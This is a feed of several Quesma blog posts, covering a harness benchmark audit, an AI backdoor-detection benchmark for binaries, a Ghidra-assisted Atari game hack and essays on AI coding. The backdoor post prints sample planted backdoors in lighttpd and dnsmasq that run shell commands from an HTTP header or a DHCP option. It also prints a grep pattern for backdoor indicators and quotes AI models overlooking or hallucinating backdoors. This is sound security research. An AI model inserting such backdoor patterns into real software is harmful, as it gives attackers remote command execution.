DEV Community: Team Quesma

Compare harnesses not models: Blitzy vs GPT-5.4 on SWE-Bench Pro

Team Quesma — Tue, 14 Apr 2026 12:23:07 +0000

This blog post was authored by Piotr Migdal and Piotr Grabowski.

Last year, agentic IDE tooling and vibe coding went mainstream. But enterprise systems – payments, mainframes, decade-old technology – aren’t disrupted by this. These codebases are enormous, require massive context, have very little public training data for the models to learn on, and are mission critical to the business. There is a massive untapped market here.

For enterprise codebases, the model alone is not enough, placing a massive emphasis on the agent harness or orchestration layer. In particular, Blitzy, an agentic software development platform, recently achieved a 66.5% score on SWE-Bench Pro Public, one of the leading AI coding benchmarks. The current state-of-the-art base model on this benchmark is GPT-5.4 (released early March 2026), which achieved a score of 57.7%.

All SWE-Bench Pro Public scores are self-reported. Blitzy’s score was independently verified by Quesma. Top results: Blitzy (66.5%), WarpGrep v2 (59.1%), and GPT-5.4 (57.7%).

SWE-Bench Pro Public is run by Scale AI, a company that primarily sells data to model owners. They have no incentive to validate harnesses, only base models.

Yet, with base models already being smart enough to tackle hard PhD-level questions, the missing gap is how to utilize infrastructure around the models to drive better and more consistent performance. Recent tests on a planning benchmark showed that a harness offered an improvement for Gemini 3.1 Pro, Claude Opus 4.6 and GPT 5.4 over their native Gemini CLI, Claude Opus, or Codex.

For example, a fragment of the Gemini 3.1 Pro announcement shows GPT-5.3-Codex achieving a much higher score on Terminal-Bench 2.0 with its dedicated Codex AI agent than with the benchmark-default Terminus-2.

That’s the gap Quesma fills: we stepped in to independently verify whether a harness can genuinely outperform raw models in these complex environments, and what the actual advantage is.

We were contracted by Blitzy to audit and verify their results. Our goal was to ensure their process adhered to benchmarking best practices. We audited their execution environment and required them to apply our recommendations before validating the run. Here is what we found, and what it implies for enterprise software development.

How enterprise harnesses differ from standard IDE agents

Blitzy describes itself as an autonomous software development platform purpose built for complex, large enterprise codebases. Its interface differs significantly from the terminal tools (like Claude Code) or IDE integrations (like Cursor) most engineers are used to. Instead of targeting solo developers, it focuses on enterprise workflows – and it mirrors a seasoned enterprise engineering team’s process.

Before Blitzy starts any work on code generation, the platform launches collaborative agents to deeply analyze the repository – mapping dependencies, understanding conventions, and capturing domain logic. This documentation process can take hours or days. When prompted to add a feature, refactor code or fix bugs, Blitzy replies with a highly detailed technical specification. Once confirmed, the platform sequences the work, spawns specialized agents and coordinates them to execute the plan and validate the code before shipping.

Blitzy is an opinionated platform that spends vast amounts of time (and tokens) deeply understanding a codebase. It takes considerable effort to draft a precise execution plan – very much in the spirit of spec-driven development – and it explicitly verifies its results before showing code to engineering teams, rather than cutting corners. Its pricing is accordingly at the enterprise level, rather than the $200/month most of us are used to.

Auditing the 66.5% SWE-Bench Pro score

SWE-Bench Pro is one of the key industry benchmarks for AI coding capabilities, typically listed alongside Terminal-Bench 2.0 during new model releases. Its tasks, rather than artificially created puzzles, are real-world GitHub issues extracted from open-source repositories. SWE-Bench Pro serves as the successor to SWE-bench Verified, which not only saturated at around 80% but also may not distinguish newest models. For reference, Blitzy scored 86.8% on SWE-Bench Verified; just as this benchmark is getting discontinued, its public leaderboard does not accept closed-source agents’ scores.

Verification - was there any reward hacking?

Agents are smart and resourceful. They can find loopholes, investigate available tools, search online for solutions, and notice if there are some extra resources they can use to extract hints. In the real world, we want to use every piece of knowledge. In benchmarking it is different - we need to restrict resources, so that results can be compared fairly.

Blitzy sent us both solutions and trajectories - long files with tens to hundreds of interactions between agents and their system (called agent turns). We re-ran the solutions and checked for things that are likely to affect the result - any web searches, internet access beyond installation procedures, access to unauthorized git branches, or any other indicator of a leak like referencing previous runs or GitHub issue numbers. It would be a red flag if the suggested code change is too close to a reference solution (so-called golden patch).

We found nothing that would affect the score. All irregularities were benign or within the quirks of the benchmark itself. Score holds!

Why raw models fail at the last mile

We wanted to understand why Blitzy succeeded where the best raw model fails. As trajectories for GPT-5.4 are not available, we ran it on the most difficult tasks solved by Blitzy.

While in some cases GPT-5.4 failed, in the majority of cases the incorrect solutions were “almost there”. The model generally had a good idea of the fix, but got lost in the execution details.

" width="800" height="238">A sample of 9 tasks solved by Blitzy, but not by GPT-5.4, with reasoning setting set to xhigh.

Verdict for Blitzy

With the benchmark score verified and the raw model’s shortcomings clear, the takeaway is straightforward. What we have seen is the difference in the last step of making sure the code actually works.

Terminal-based coding agents often operate with a “fingers crossed” mentality. They eagerly commit and push, but when asked if they actually ran the tests, the models admit they haven’t – but insist the code “should work”. That is the fundamental difference between an enthusiastic intern and a senior software developer.

It is highly likely that Blitzy’s performance edge is even more pronounced in closed-source enterprise projects, especially those relying on rare technologies or internal frameworks. In those environments, having agents that methodically document the repository and rigorously verify its changes makes a night-and-day difference.

The fundamental tradeoff between time, quality, and money

Software development is always a tradeoff between time, quality, and money. For fast-paced startups, speed is the primary factor and developers are encouraged to “move fast and break things”. Claude Code was built for this workflow.

For a vibe coder, waiting a few hours feels like ages. But for a real-world enterprise scale project, it represents incredibly fast-paced development – especially when you need well-specified features, intricate refactoring or reliable bug fixes for a mature codebase, rather than just spinning up a small, greenfield project.

Mature, enterprise projects require a much more methodical approach. In mission-critical systems (like payment infrastructure or legacy mainframes that still process the majority of global credit card transactions), the same “move fast and break things” mentality is a liability.

Burning more tokens does not guarantee better results. Designing delightful frontends with GPT-5.4, an official tutorial by OpenAI, recommends:

For simpler websites, more reasoning is not always better. In practice, low and medium reasoning levels often lead to stronger front-end results, helping the model stay fast, focused, and less prone to overthinking, while still leaving headroom to turn reasoning up for more ambitious designs.

The future of AI coding is in the scaffolding

For end customers, harness vs. model is irrelevant – what matters is the result. And we’re seeing (e.g. with our Blitzy vs. GPT-5.4 comparison) that harnesses matter more this year than just switching between frontier models. While base models are constantly evolving, the most impactful change might actually be the evolution of the agentic harnesses built around them. It is worth remembering that Claude Code is still less than a year old!

Until recently, AI agents were primarily geared toward solo developers building greenfield applications or tinkering with side projects. But since December 2025, base models have become vastly more powerful, and the major releases in early 2026 have only doubled down on that trend. The race to build AI tools for solo developers is already well underway, but the race for autonomous, enterprise-grade engineering agents has only just begun.

We hid backdoors in binaries — Opus 4.6 found 49% of them

Team Quesma — Thu, 19 Feb 2026 11:55:22 +0000

This blog post was authored by Piotr Grabowski, Rafał Strzaliński, Michał Kowalczyk, Piotr Migdał, and Jacek Migdal.

Claude can code, but can it check binary executables?

We already did our experiments with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, reverse engineering expert from Dragon Sector, known for finding malicious code in Polish trains, to create a benchmark of finding backdoors in binary executables, without access to source code.

See BinaryAudit for the full benchmark results — including false positive rates, tool proficiency, and the Pareto frontier of cost-effectiveness. All tasks are open source and available at quesmaOrg/BinaryAudit.

We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.

However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.

In this blog post, we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.

Background

Just a few months ago Shai Hulud 2.0 compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — see postmortem by PostHog. It was a supply chain attack for the Node Package Manager ecosystem, injecting malicious code stealing credentials.

Just a few days ago, Notepad++ shared updates on a hijack by state-sponsored actors, who replaced legitimate binaries with infected ones.

Even the physical world is at stake, including critical infrastructure. For example, researchers found hidden radios in Chinese solar power inverters and security loopholes in electric buses. Every digital device has a firmware, which is much harder to check than software we install on the computer — and has much more direct impact. Both state and corporate actors have incentive to tamper with these.

Michał “Redford” Kowalczyk from Dragon Sector on reverse engineering a train to analyze a suspicious malfunction, the most popular talk at the 37th Chaos Communication Congress. See also Dieselgate, but for trains writeup and a subsequent discussion.

You do not even need bad actors. Network routers often have hidden admin passwords baked into their firmware so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.

Can we use AI agents to protect against such attacks?

Binary analysis

In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.

Malware analysis forces us into a harder world: binary executables.

Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variables and functions names gets lost.

To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.

Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.

Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: machine code → assembly → pseudo-C. Let’s see how an example backdoor looks in those representations:

1. Raw Binary

b9 01 00 00 00 48 89 df ba e0 00 00 00 e8 b6 c6 ff ff 49 89 c5 48 85 c0 74 6e 44 0f b6 40 01 4c 8d 8c 24 a0 01 00 00 49 8d 75 02 4c 89 cf 4c 89 c0 41 83 f8 08 72 0a 4c 89 c1 48 c1 e9 03 f3 48 a5 31 d2 41 f6 c0 04 74 09 8b 16 89 17 ba 04 00 00 00 41 f6 c0 02 74 0c 0f b7 0c 16 66 89 0c 17 48 83 c2 02 41 83 e0 01 74 07 0f b6 0c 16 88 0c 17 4c 89 cf c6 84 04 a0 01 00 00 00 e8 b7 4c fd ff

2. Disassembly

33e88:  mov    ecx, 0x1
33e8d:  mov    rdi, rbx
33e90:  mov    edx, 0xe0
33e95:  call   30550
33e9a:  mov    r13, rax
33e9d:  test   rax, rax
33ea0:  je     33f10
33ea2:  movzx  r8d, BYTE PTR [rax+1]
33ea7:  lea    r9, [rsp+0x1a0]
33eaf:  lea    rsi, [r13+0x2]
        ... (omitted for brevity)
33efc:  mov    BYTE PTR [rsp+rax+0x1a0], 0x0
33f04:  call   system@plt

3. Decompiled

lVar18 = FUN_00130550(pcVar41, param_4, 0xe0, 1);

if (lVar18 != 0) {
    bVar49 = *(byte *)(lVar18 + 1);
    puVar26 = (undefined8 *)(lVar18 + 2);
    pcVar20 = (char *)&local_148;

    if (7 < bVar49) {
        for (uVar44 = (ulong)(bVar49 >> 3); uVar44 != 0; uVar44--) {
            *(undefined8 *)pcVar20 = *puVar26;
            puVar26++; pcVar20 += 8;
        }
    }

    *(undefined1 *)((long)&local_148 + (ulong)bVar49) = 0;

    system((char *)&local_148);
}

Going from raw bytes to assembly is straightforward, as it can be viewed with a command-line tool like objdump.

Turning assembly into C is much harder — we need reverse engineering tools, such as open-source Ghidra (created by NSA) and Radare2, or commercial ones like IDA Pro and Binary Ninja.

The decompilers try their best at making sense of the CPU instructions and generating a readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. You see output full of FUN_00130550, bVar49, local_148 — names that mean nothing.

The benchmark

Tasks

We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.

We started with several open-source projects: lighttpd (a C web server), dnsmasq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.

Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.

These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.

The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: Ghidra, Radare2, and binutils. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., 0x4a1c30). See dnsmasq-backdoor-detect-printf/instruction.md for a typical instruction.

A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location – see e.g. sozu-backdoor-multiple-binaries-detect/instruction.md. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.

An example when it works

Backdoor in an HTTP server

We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.

Here’s the core of the injected backdoor — it looks for a hidden X-Forwarded-Debug header, executes its contents as a shell command via popen(), and returns the output in a response header:

gboolean li_check_debug_header(liConnection *con) {
    liRequest *req = &con->mainvr->request;
    GList *l;

    l = li_http_header_find_first(req->headers, CONST_STR_LEN("X-Forwarded-Debug"));
    if (NULL != l) {
        liHttpHeader *hh = (liHttpHeader*) l->data;
        char *debugIn = LI_HEADER_VALUE(hh);

        FILE *fp = popen(debugIn, "r");  // Execute attacker's command
        // ... read output into debugOut ...
        pclose(fp);

        li_http_header_insert(con->mainvr->response.headers,
            CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
    }
    return TRUE;
}

For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.

Claude Opus 4.5 found the backdoor within 5 minutes

Here’s how Claude did it:

Step 1. The model identified the binary and its 26 shared libraries — one of which contained the backdoor.

Step 2. Next, it ran stringswith grep patterns looking for obvious indicators of a backdoor:

strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'

However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.

Step 3. Claude switched strategies and used nm -D to list imported functions:

for f in lib/*.so; do
  nm -D "$f" | grep -E ' U (system|exec|popen)'
done

This revealed something interesting:

lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5

Claude detected that one of the libraries that the server uses imports popen(): function used to execute shell commands. It immediately alarmed the model:

Claude Opus 4.5: The liblighttpd2-shared.so uses popen(). This could be legitimate (for spawning worker processes) or could be a backdoor. I need to investigate what these functions are used for by decompiling the code.

Step 4. Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.

It first identified which function calls popen():

r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so

The output of this command revealed that a function called li_check_debug_header does shell execution. (That’s the backdoor we added!). The model smelled something fishy:

Claude Opus 4.5: This is very suspicious! A “debug header” function calling popenis a classic backdoor pattern — it could be checking for a special HTTP header and executing commands based on it.

Then using Radare2’s decompiler, the model examined the function:

r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so

The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header X-Forwarded-Debug and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a X-Request-Trace response header.

Step 5. Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:

r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so

Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.

When it fails: rationalizing away an obvious backdoor

DHCP backdoor

However, LLMs very often miss even obvious backdoors.

We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl("/bin/sh", "sh", "-c", buf, NULL).

The backdoor we added was just 7 lines of C in DHCP packet parsing:

/* existing DHCP option handling */
match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+   char buf[256];
+   int len = option_len(opt);
+   memcpy(buf, option_ptr(opt, 0), len);
+   buf[len] = '\0';
+   execl("/bin/sh", "sh", "-c", buf, NULL);
+ }

Claude Opus 4.6 found it… and persuaded itself there is nothing to worry about
Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl("/bin/sh", "sh", "-c", ...) call. Then it simply assumed it was normal:

Claude Opus 4.6: I can see the /bin/sh usage at 0x42e9df— it’s calling execl("/bin/sh", "sh", "-c", r13, NULL). This is a pattern for executing a shell command, which could be legitimate in dnsmasq (e.g., for DHCP script execution).

It examined the function, but concluded:

Claude Opus 4.6: The execl("/bin/sh", "sh", "-c", ...) pattern is typical of dnsmasq’s DHCP lease script execution. This is likely the legitimate lease_helper/script execution function.

The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from client). It then moved on to investigate other functions and never circled back.

The needle-in-haystack problem

The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.

Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like system() or exec(). When simple heuristics fail, models frequently hallucinate or give up entirely.

This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.

Limitations

False positives

The security community is drowning in AI-generated noise. The curl project recently stopped paying for bug reports partly because of AI slop:

The vast majority of AI-generated error reports submitted to cURL are pure nonsense.

A security tool which gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks — clean binaries with no backdoor. We found that 28% of the time models reported backdoors or issues that weren’t real. For any practical malware detection software, we expect a false positive rate of less than 0.001%, as most software is safe, vide false positive paradox.

False positive rate measures how often models incorrectly report backdoors in clean binaries. Lower is better. See also detection vs false alarms combining it with pass rate.

For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:

Gemini 3 Pro: I have confirmed that the max-cache-ttl option (index 312, 0x138) is handled by code that treats its argument as a string and stores it at offset 0x138 of the global configuration structure. This is highly suspicious for a TTL option which should be an integer.
Furthermore, the function fcn.0002b260 reads the string from offset 0x138, appends ” ini” to it, and executes it using popen. The output is then parsed for a “duid”.
This behavior allows an attacker to execute arbitrary commands by passing them as the argument to the --max-cache-ttl option (e.g., --max-cache-ttl=/bin/sh). This is a clear backdoor disguised as a legitimate configuration option.

In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.

The gap in open-source tooling

We restricted agents to open-source tools: Ghidra and Radare2. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at operating them — correctly loading binaries and running basic commands.

However, these open-source decompilers lag behind commercial alternatives like IDA Pro. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.

For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded in 6 minutes but produced poor quality code, while Ghidra not only took 40 minutes just to load, but was not able to return correct data. At the same time, IDA Pro loaded in 5 minutes, giving correct, usable code, sufficient for manual analysis.

To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.

Conclusion

Results

Can AI find backdoors in binaries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.

As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.

It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.

Binary analysis is no longer just for experts

While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.

A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.

The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.

Future

We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).

Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.

Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.

You can check the full results and see the tasks at QuesmaOrg/BinaryAudit.

Reverse engineering River Raid with Claude, Ghidra, and MCP

Team Quesma — Thu, 29 Jan 2026 09:15:09 +0000

This blog post was authored by Rafal Strzalinski.

Can an AI agent navigate Ghidra, the NSA’s open-source reverse engineering suite, well enough to hack an Atari game? Ghidra is powerful but notoriously complex, with a steep learning curve. Instead of spending weeks learning its interface, what if I could simply describe my goal and let an AI handle the complexity?

Childhood dream

River Raid, the Atari 8-bit version. My first computer was an Atari back in the 80s, and this particular game occupied a disproportionate amount of my childhood attention.

The ROM is exactly 8kB — almost comical by modern standards. And yet this tiny binary contains everything: graphics, sound, enemy AI, and physics simulation — all compressed into hand-optimized 6502 assembly.

The objective was straightforward: unlimited lives. It’s the quintessential hack, a rite of passage that kids with hex editors performed for entertainment back in the 80s. In 2025, instead of a hex editor, I have an AI.

Setup

Ghidra doesn’t have a native AI assistant, so I needed a way to bridge the gap between my instructions and the tool’s internal API. This is where the Model Context Protocol (MCP) comes in.

I found an open-source MCP server for Ghidra — essentially a connector that allows Claude to talk directly to Ghidra. The concept is elegant: Claude connects to the running Ghidra instance, analyzes the binary, renames functions, and identifies code patterns programmatically.

In practice, the experience was considerably less elegant:

MCP has no standard distribution format (e.g., Docker, npm) — you git clone and hope for the best.
The resulting chain is: Claude → MCP server → Ghidra extension → Ghidra. Four components, four places where things can break.

AI meets 6502

Here’s the thing: I don’t use disassemblers daily. Ghidra’s workflow was completely foreign to me. The whole point was to see if AI could bridge that gap — I’d feed it a mysterious binary, and the Ghidra + LLM combination would figure out it’s a cartridge dump, handle the memory mapping, and guide me through.

Reality was harsher. To test the AI properly, I renamed the binary to a.rom — no helpful filename hints. When importing, I selected only the CPU architecture (6502) without specifying the platform. Claude’s first instinct was reasonable: it asked for the MD5 hash to search for known ROM signatures. The MCP tools don’t expose hashing, so that avenue closed immediately.

First problem: Ghidra loaded the ROM at $0000, not $A000 where Atari cartridges live. All cross-references pointed nowhere.

Claude identified the issue with admirable clarity: “The ROM should be loaded at $A000, not $0000. You’ll need to rebase the memory image.”

Me: “Can you perform the rebase?”

Claude: “Unfortunately, no. The MCP tools don’t have write access for that particular operation.”

I rebased manually to $8000 — still wrong. The code referenced $A000-$BFFF. Rebased again.

Two rebasing operations in total, neither of which the AI could perform.

Where Claude genuinely excelled was in identifying the target platform through hardware register analysis:

Hardware addresses are essentially fingerprints that can’t be faked, and these particular addresses are unmistakably Atari 8-bit.

I asked Claude to attempt identification of the game based purely on code patterns and structural analysis. It examined the evidence methodically. Based on this evidence, Claude reached its conclusion:

It was, of course, not Centipede. It was River Raid.

This serves as a useful reminder that confidence and accuracy are orthogonal properties.

The hack

Despite the identity crisis, Claude still understood the code structure. Finding the lives decrement was straightforward. Claude searched for the canonical pattern: load, decrement, store.

The fix is elegantly simple: replace DEY (decrement Y register) with NOP(no operation). A single byte modification, where $88 becomes $EA.

Since the MCP tool couldn’t write the binary directly, I applied the patch externally:

printf '\xEA' | dd of=riverraid.bin bs=1 seek=$((0x355)) conv=notrunc

I tested the patched ROM in an emulator by deliberately crashing into a bridge. The lives counter remained stubbornly fixed at 3.

The hack works as intended.

What worked, what didn’t

Claude excelled at pattern recognition — hardware registers, code flow, finding the patch location. It struggled with tasks requiring broader context, such as identifying the game or analyzing sprite data.

Setting up MCP is a troubleshooting ritual. It eventually worked, but the experience was painfully slow. Claude would fire off a batch of tool calls, some taking 30 seconds each. Too slow for an interactive session — I’d rather have quick responses with clarifying questions than watch a progress bar crawl. We need a better balance between autonomous batch processing and interactive guidance.

AI should be embedded in every complex GUI tool. We’re in the experimental phase now. Some things work, some don’t. Ideally AI should smooth out the experience in ways traditional help systems never could — compacted Stack Overflow knowledge, real context-aware assistance, and the ability to actually perform tasks rather than just describe them.

Vibe coding needs git blame

Team Quesma — Mon, 26 Jan 2026 09:17:45 +0000

If you write a program in English and AI translates it into Python, which one is the actual source code?

In the age of vibe coding[1], prompts are becoming the human interface. This raises a new dilemma: should we store these prompts alongside the code they generate, or discard them as transient artifacts?

The community is divided. When Gergely Orosz polled developers about making prompts visible to code reviewers, opinions split: 49% loved it, while 24% hated the idea. Meanwhile, the industry is betting on a fundamental shift: Cursor acquiring Graphite, a startup that uses AI to review and debug code, and Meta creating internal tooling to publish prompts.

We are still figuring out the norms for this new reality.

Are prompts the new source code?

Traditionally, source code is what humans write, and machine code is what computers execute.

For the end user, the build is all that matters. They download binaries or open the website. They don’t care about the code, nor should they. Yet source code is what is needed for development — and sufficient to generate builds.

With vibe coding, we translate natural language into programming language:

If prompts are the real “source”, should we be committing them instead of the Python, TypeScript, or Rust they generate? It might be tempting to cut the middleman and treat our instructions as source code. But it does not work that way.

Building code is deterministic, or close to it. Code that compiles only during a full moon is not good code. In 2026 we are well past the era of “works on my machine” and should never go back there.

Good repositories have a clear way of execution, so there is no guesswork on which commands to run, or which package version to use. In most modern languages, toolsets are good — both in package managers and in other tooling — Dockerfiles, GitHub Actions, or similar.

At the same time, generating code from prompts is non-deterministic by nature, and hard to replicate.

Probabilistic nature: We can try to set temperature=0, but it is neither supported by all APIs nor guaranteed to produce the best result (see this beautiful Transformer Explainer). Guaranteeing determinism is a research problem.
Lack of long-term support: Models update silently or are deprecated. Unlike pinned package versions, we cannot rely on a specific model snapshot existing forever.
Hard to capture context: LLMs work best with rich context beyond the prompt itself, including conversation history, memory, skills, screenshots, tool outputs, and MCP servers.

Even in the simplest case, results differ.

Same prompt (“Create an HTML file with a cute, interactive octopus.”), same agent (Claude Code), same model (Opus 4.5), still — slightly different results.

In larger projects, the same prompt might solve an issue once, fail another time, and introduce a new bug.

Even something as explicit as “correct grammar” of a single blog post yields different outcomes.

I ran four instances of Gemini 3 Pro in parallel in Cursor, with the same prompt — “Correct grammar in this post”. Even for standard tasks, each worked differently and gave different results.

Where is the room for prompts?

Prompts are a kind of spec. They can be very vague, leaving a lot of room for interpretation.

Natural language does not compile — which is both a feature and a curse.

Even when they are precise, there is still space left[2]. Just because we gave a clear specification and asked someone (or something) to do it, doesn’t mean it works yet. Current LLMs are far from perfect. Sometimes they fail instructions that would be clear to an employee.

That’s why prompts are best treated as intentions and notes from the development process — useful context, not a reliable build input.

We should be able to (git) blame AI

I think that all contributions from AI should be attributed as such (both code changes and commits). Not because they are worse (or better), but as an essential troubleshooting tool. More and more open source projects require clear disclosure on AI contributions[3].

Among other things, it is crucial to know: what was intended, what was a conscious decision, and what just “happened”.

From stared/sc2-balance-timeline, my entirely vibe-coded side project 15 Years of StarCraft II Balance Changes Visualized. Each commit is also Claude-generated, so I can compare package changes with their intention.

Tracking prompts helps us on a few levels:

Learning: The AI world is moving so fast it is hard to catch up. Learning from peers is super valuable — even Andrej Karpathy mentioned he feels behind. Seeing how others prompt models helps us improve our own workflows.
Intent verification: We can understand the intention behind a change by reading the prompt.
Efficient reviewing: AI makes it easy to create a commit, but it may take more time to review. Knowing code is AI-generated signals where to look closer. For example some code such as UI can be AI-generated, while we want human precision in auth logic.

Reservations

One of the issues with saving prompts is the human factor. Tracking prompts is awkward due to creative flow, privacy, anger, and messiness:

Dirty notebook: People often write prompts as a stream of consciousness, full of typos and idiosyncrasies.
Privacy: Prompts might contain passwords, API keys, or personal data we don’t want to share publicly.
Profanity: People behave less civilly towards AI than they would towards coworkers. Sometimes out of frustration, other times because it might actually work (see the famous leaked Windurf prompt).
Sense of pride: For many, coding is a craft that demonstrates high-value skills. Using an LLM can make the output feel less “earned”.
Peer pressure: There is a huge amount of “AI Slop” and valid skepticism. Many communities or reviewers automatically reject AI-assisted submissions.

We need redaction capabilities. Just as we squash dirty commits before pushing to a public repository, we should be able to curate our prompts.

Conclusion

Code reviews are evolving, and controversy is inevitable.

We already have standards like MCPand SKILL.md — and we need one to share prompts alongside git commits. We are building an open-source tool to help with this — stay tuned!

In the meantime, start simple: if you use AI to write code, use AI to write the commit message.

It is frustrating to see dozens of AI-generated files committed with a lazy fixed it. If a tool allows vibe coding, it should also allow vibe committing.

Footnotes

[1]: See our recent post How 2025 took AI from party tricks to production tools. Even the term “vibe coding” was coined in February, see Andrej Karpathy’s musings. Right now, Claude Code is written in Claude Code.

[2]: Law is codified, yet requires courts for interpretation. Even mathematics, despite its precision, leaves room for underspecification — hence the need for proof checkers, see AI will make formal verification go mainstream.

[3]: Ghostty requires clear AI disclosure, Gentoo plans to ban AI contribution, and there is a lot of general discussion on a good standard for peer-reviewing AI-assisted pull requests. People actually read Claude-generated Claudflare’s code.

How 2025 took AI from party tricks to production tools

Team Quesma — Mon, 05 Jan 2026 13:16:29 +0000

This blog post was authored by Piotr Migdal.

What began 2025 as bold experiments became the industry standard by year’s end. Two paradigms drove this shift: reasoning models (spending tokens to think before answering) and agentic tool use (executing code to interact with the world).

This subjective review of LLMs for software engineering covers three stages: the experimental breakthroughs of the first half of 2025, the production struggles where agents were often too chaotic to be useful, and the current state of practical, everyday tools.

First half of 2025

January

DeepSeek released the first open-source reasoning model, DeepSeek-R1, sharing both weights and know-how. It broke the paradigm that AI is, and will remain, an oligopoly of proprietary models. Previously we only had o1, released in Sept 2024 by OpenAI.

February

Andrej Karpathy coined the term “vibe coding” for programming where we primarily use plain language rather than code. For me, it took time to sink in. Now, it is a thing I do for hours a day.
Later, OpenAI released GPT-4.5 - a real marvel. While it got closed and nothing matches its ability to brainstorm - more frank, less reserved and censored, creative, adjustable - I miss it, or should I say, them. It was expensive ($2 per single run in Cursor), but unparalleled at advanced translations.
OpenAI released Deep Research, which spends time doing multiple searches and summarizing them. Initially costly and slow, but still saving time on web search.
Anthropic released command line tool for agentic coding Claude Code as research preview.

March

ARC-AGI-2 was an attempt to create a test for AI that is impossible to solve. Top models had 1% or so performance.
